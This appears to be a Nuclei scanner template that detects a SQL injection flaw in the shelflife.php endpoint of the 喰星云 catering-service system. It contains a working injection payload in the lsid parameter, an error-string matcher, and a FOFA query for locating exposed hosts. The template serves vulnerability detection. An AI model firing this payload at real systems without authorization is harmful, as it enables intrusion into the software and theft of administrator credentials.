id: danxingyun-shelflife-sqli
info:
  name: 喰星云·数字化餐饮服务系统 shelflife.php - sqli
  author: leadlife
  severity: high
  description: 喰星云·数字化餐饮服务系统 shelflife.php 接口处存在SQL注入漏洞，未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息，导致后台权限被控，造成信息泄露，使系统处于极不安全的状态。
  reference: 
    - https://github.com/wy876/POC/blob/13fda87f0d865d7de818858de3e7d2d69d787e14/%E5%96%B0%E6%98%9F%E4%BA%91-%E6%95%B0%E5%AD%97%E5%8C%96%E9%A4%90%E9%A5%AE%E6%9C%8D%E5%8A%A1%E7%B3%BB%E7%BB%9Fshelflife.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="tmp_md5_pwd"
  tags: sqli,danxingyun

http:
  - raw:
      - |
        GET /logistics/home_warning/php/shelflife.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - contains(body,'服务器内部错误，请与管理员联系')
        condition: and